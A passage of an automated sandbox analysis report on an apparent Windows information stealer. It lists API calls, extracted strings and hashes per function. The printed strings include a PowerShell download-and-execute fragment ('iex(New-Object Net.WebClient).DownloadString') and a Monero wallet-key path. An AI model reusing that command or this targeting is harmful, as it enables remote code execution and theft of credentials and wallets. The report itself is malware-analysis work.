                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                              • String ID:
                              • API String ID: 3066467675-0
                              • Opcode ID: 3cc2271e0d8dd89e2287b290bd204a84c49487419a833316f23835aec1874764
                              • Instruction ID: 8b7e80bcdc73c6cb8feae758fdb7c7c922b85f909697f93ffce193ed4c4a9b3f
                              • Opcode Fuzzy Hash: 3cc2271e0d8dd89e2287b290bd204a84c49487419a833316f23835aec1874764
                              • Instruction Fuzzy Hash: A631F7B4A00218EBDB20DF54DC85BD8B7B4FB48704F5081D9F609A7285CB756A858FA8
                              Function 00DF8100 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0197EC20,00000000,?,00E00E2C,00000000,?,00000000), ref: 00DF8130
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00DF8137
                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00DF8158
                              • wsprintfA.USER32 ref: 00DF81AC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB$@
                              • API String ID: 2922868504-3474575989
                              • Opcode ID: b77fcbb1f89f971ab0b424497f427a73d7f3f1548662b68654ffdc6ecb477337
                              • Instruction ID: 7f8d9f0be049c980da77cb8076944dffc0a2677623dbcbeacf2dca0f6ce5b7d1
                              • Opcode Fuzzy Hash: b77fcbb1f89f971ab0b424497f427a73d7f3f1548662b68654ffdc6ecb477337
                              • Instruction Fuzzy Hash: B821F9B1E44218ABDB10DFD4CC49FAEB7B9EB44B10F208609F705BB284DB7959058BA5
                              Function 00DF83DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                              Download Yara Rule
                              APIs
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00DF8426
                              • wsprintfA.USER32 ref: 00DF8459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00DF847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 00DF848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00DF8499
                                • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                              • RegQueryValueExA.ADVAPI32(00000000,0197EAD0,00000000,000F003F,?,00000400), ref: 00DF84EC
                              • lstrlen.KERNEL32(?), ref: 00DF8501
                              • RegQueryValueExA.ADVAPI32(00000000,0197EC50,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00E00B34), ref: 00DF8599
                              • RegCloseKey.ADVAPI32(00000000), ref: 00DF8608
                              • RegCloseKey.ADVAPI32(00000000), ref: 00DF861A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                              • String ID: %s\%s
                              • API String ID: 3896182533-4073750446
                              • Opcode ID: 79f3e6a64ad31ca7adbdf91ac883718ae6a83753f634fbd715f7a3b2ad8fd640
                              • Instruction ID: 9a95b52d523c6463e0ecba1c03b3eed4da58b583dc31fff527696cd2b9e4f2c8
                              • Opcode Fuzzy Hash: 79f3e6a64ad31ca7adbdf91ac883718ae6a83753f634fbd715f7a3b2ad8fd640
                              • Instruction Fuzzy Hash: 2821F8B1A0022CABDB24DF54DC85FE9B3B8FB48700F10C598E649A6140DF756A85CFA4
                              Function 00DF7690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DF76A4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00DF76AB
                              • RegOpenKeyExA.ADVAPI32(80000002,0196B9A8,00000000,00020119,00000000), ref: 00DF76DD
                              • RegQueryValueExA.ADVAPI32(00000000,0197EBA8,00000000,00000000,?,000000FF), ref: 00DF76FE
                              • RegCloseKey.ADVAPI32(00000000), ref: 00DF7708
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: 08b1593b9e4dbb3d64552687d71c5fd4b5afbfae09fe65dd34e272f1fc9ffecd
                              • Instruction ID: 3b050dab3a5dd4ec0e9a34dacac8663191723e5988f8ddbd420573f6f31512cd
                              • Opcode Fuzzy Hash: 08b1593b9e4dbb3d64552687d71c5fd4b5afbfae09fe65dd34e272f1fc9ffecd
                              • Instruction Fuzzy Hash: AE0144B5B04209FBD720EFE4DC49FBA77B8EB44701F208454FB45D7584DAB599008B60
                              Function 00DF7720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DF7734
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00DF773B
                              • RegOpenKeyExA.ADVAPI32(80000002,0196B9A8,00000000,00020119,00DF76B9), ref: 00DF775B
                              • RegQueryValueExA.ADVAPI32(00DF76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00DF777A
                              • RegCloseKey.ADVAPI32(00DF76B9), ref: 00DF7784
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              • Opcode ID: b5029743c85a254cb23aeb82103525efad0d4342354887d0fcf8c541745bfd02
                              • Instruction ID: cad6b0de3a6ae4babb2dd58647a596255922eca599a1f25e7c66af966ef3a1bc
                              • Opcode Fuzzy Hash: b5029743c85a254cb23aeb82103525efad0d4342354887d0fcf8c541745bfd02
                              • Instruction Fuzzy Hash: 550144B5B40308FBDB20DFE0DC49FAEB7B8EB44701F108555FA45A7285DAB556008B61
                              Function 00DE99C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DE99EC
                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00DE9A11
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00DE9A31
                              • ReadFile.KERNEL32(000000FF,?,00000000,00DE148F,00000000), ref: 00DE9A5A
                              • LocalFree.KERNEL32(00DE148F), ref: 00DE9A90
                              • CloseHandle.KERNEL32(000000FF), ref: 00DE9A9A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: e27f54c9dc0eef19010f45e5a9b7469a1a92a8343575b1238f24c3092bd8c932
                              • Instruction ID: 629248a6fa37975576a41ee3cefeb05bd4120b76f05b2f5e3e9a103db64f90c4
                              • Opcode Fuzzy Hash: e27f54c9dc0eef19010f45e5a9b7469a1a92a8343575b1238f24c3092bd8c932
                              • Instruction Fuzzy Hash: 15313EB4A00209EFDB24DFA5D995BAEB7B5FF48340F108168E905A7284D779A941CFB0
                              Function 00DF4780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcat.KERNEL32(?,0197ED10), ref: 00DF47DB
                                • Part of subcall function 00DF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00DF8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00DF4801
                              • lstrcat.KERNEL32(?,?), ref: 00DF4820
                              • lstrcat.KERNEL32(?,?), ref: 00DF4834
                              • lstrcat.KERNEL32(?,0196B000), ref: 00DF4847
                              • lstrcat.KERNEL32(?,?), ref: 00DF485B
                              • lstrcat.KERNEL32(?,0197D230), ref: 00DF486F
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                                • Part of subcall function 00DF8D90: GetFileAttributesA.KERNEL32(00000000,?,00DE1B54,?,?,00E0564C,?,?,00E00E1F), ref: 00DF8D9F
                                • Part of subcall function 00DF4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00DF4580
                                • Part of subcall function 00DF4570: RtlAllocateHeap.NTDLL(00000000), ref: 00DF4587
                                • Part of subcall function 00DF4570: wsprintfA.USER32 ref: 00DF45A6
                                • Part of subcall function 00DF4570: FindFirstFileA.KERNEL32(?,?), ref: 00DF45BD
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                              • String ID:
                              • API String ID: 2540262943-0
                              • Opcode ID: b145e29ee0494bad856f921c5069ef279bf90adcc76f006b6251922bc4e9095d
                              • Instruction ID: a8196d71f20cacd9a972eb84cf7e8b15ab931e3127ee56da502ef8dd83bfeb9b
                              • Opcode Fuzzy Hash: b145e29ee0494bad856f921c5069ef279bf90adcc76f006b6251922bc4e9095d
                              • Instruction Fuzzy Hash: 3E3152B6A0021C97CB20FBA0DC85EFD7378AB58704F408589F35996085EEB5D7898FB5
                              Function 00DF2C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                                • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                                • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                                • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                                • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                                • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                                • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00DF2D85
                              Strings
                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00DF2CC4
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00DF2D04
                              • <, xrefs: 00DF2D39
                              • ')", xrefs: 00DF2CB3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 3031569214-898575020
                              • Opcode ID: e9d3c19a435ffc76d339044fa4f2281d63dbc96e7c3ff57cac825ea92bbd528f
                              • Instruction ID: 601b1ab582eda737c4b1be2f94d404c453d58ce39ac5b4f53f90c65153a3ea3e
                              • Opcode Fuzzy Hash: e9d3c19a435ffc76d339044fa4f2281d63dbc96e7c3ff57cac825ea92bbd528f
                              • Instruction Fuzzy Hash: B141DAB180021C9ADB14EBA4C892BFDB774EF10340F55C029E60AB7195DFB46A4ACFB1
                              Function 00DE9E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                              Download Yara Rule
                              APIs
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00DE9F41
                                • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$AllocLocal
                              • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                              • API String ID: 4171519190-1096346117
                              • Opcode ID: 06e18571977496fba1432e3c1d047a50b53f03c9cd78a9adb171f9f942ce08e4
                              • Instruction ID: e11c24ea36fee546ef39e163cc4964732f97237a11c051915169fcf032e54f14
                              • Opcode Fuzzy Hash: 06e18571977496fba1432e3c1d047a50b53f03c9cd78a9adb171f9f942ce08e4
                              • Instruction Fuzzy Hash: FA611C71A00248DBDB24EFA9CC96FED7775EF44340F048118FA0A6B195EB74AA45CB71
                              Function 00DF40B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,0197D190,00000000,00020119,?), ref: 00DF40F4
                              • RegQueryValueExA.ADVAPI32(?,0197ECE0,00000000,00000000,00000000,000000FF), ref: 00DF4118
                              • RegCloseKey.ADVAPI32(?), ref: 00DF4122
                              • lstrcat.KERNEL32(?,00000000), ref: 00DF4147
                              • lstrcat.KERNEL32(?,0197ECC8), ref: 00DF415B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValue
                              • String ID:
                              • API String ID: 690832082-0
                              • Opcode ID: f5d49a0ad31930404b1991ba4d89527a67c27b414c132c94e2a6b8c43dbf0264
                              • Instruction ID: 802eb676c489b45dc280f04f48f239d8374b20b1c917d61607c1c4ab0f3727f6
                              • Opcode Fuzzy Hash: f5d49a0ad31930404b1991ba4d89527a67c27b414c132c94e2a6b8c43dbf0264
                              • Instruction Fuzzy Hash: 264146B6A00108ABDB34EFA0DC46FFE737DAB88300F508558B75557185EE759B888BB1
                              Function 00DF6920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                              Download Yara Rule
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 00DF696C
                              • sscanf.NTDLL ref: 00DF6999
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00DF69B2
